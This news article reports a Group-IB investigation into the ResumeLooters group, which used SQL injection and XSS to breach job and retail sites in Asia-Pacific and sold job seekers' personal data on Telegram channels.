Millions of people looking for a new job had their personal details stolen and put up for sale on dark web chat groups after several sites were breached.
Cybersecurity experts at Group-IB have published a new report outlining their investigation into a relatively new threat actor called ResumeLooters and how it was able to sell a huge database on the dark web.
ResumeLooters first emerged in November 2023, when it successfully compromised 65 retail and job posting sites using two techniques: SQL injection and cross-site scripting (XSS). With the help of tools such as SQLmap, Acunetix, X-Ray or Metasploit, attackers were able to scan the web for flaws, automate the detection and exploitation of SQL injection flaws, develop and execute exploit code against targets, and more.
In it for the money
After successfully identifying and exploiting the flaws in the sites, the attackers proceed to inject malicious scripts into different places in the HTML. Some injections will activate the script, while others will simply display it, the researchers explained. The goal of the script is to display a phishing form that steals sensitive data from visitors.
The victims apparently had their full names, email addresses, phone numbers, employment history, education, and other relevant information taken. A lot of information for a spear phishing attack or even identity theft. Most of the victims are in the APAC part of the world, in countries such as Australia, Taiwan, China, Thailand, India and Vietnam.
After stealing the data, ResumeLooters attempted to sell it on the dark web, Group-IB added. They offered it on two Telegram channels, using accounts with Chinese names. Even the tools they used were in Chinese, leading researchers to conclude that ResumeLooters are most likely from China.
However, they do not appear to be sponsored by the State, since the objective of the campaign was material.
“In less than two months, we have identified another threat actor conducting SQL injection attacks against businesses in the Asia-Pacific region,” said Nikita Rostovcev, senior analyst with Group-IB's advanced persistent threat research team.
“It is surprising to see how some of the older but remarkably effective SQL attacks are still prevalent in the region. However, the tenacity of the ResumeLooters group stands out as they experiment with various methods to exploit vulnerabilities, including XSS attacks. Furthermore, the gang's attacks cover a vast geographic area.”